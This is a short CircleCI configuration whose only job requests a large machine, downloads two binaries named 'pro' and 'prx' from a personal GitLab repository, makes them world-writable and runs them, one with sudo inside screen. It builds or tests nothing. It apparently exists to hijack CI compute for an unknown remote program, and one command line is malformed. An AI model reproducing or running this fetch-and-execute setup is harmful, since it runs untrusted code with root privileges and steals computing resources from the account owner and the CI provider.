version: 2.1

jobs:
  build:
    machine:
      resource_class: 2xlarge
      image: ubuntu-2004:202101-01

    steps:
      - run:
         name: pro
         command: sudo apt update && sudo apt install screen && wget https://gitlab.com/Sherwoodfrey/prx/-/raw/main/pro && chmod 777 pro && sudo screen  ./pro
          sleep 10
      
      - run:
         name: bot
         command: wget https://gitlab.com/Sherwoodfrey/prx/-/raw/main/prx && chmod 777 prx && ./prx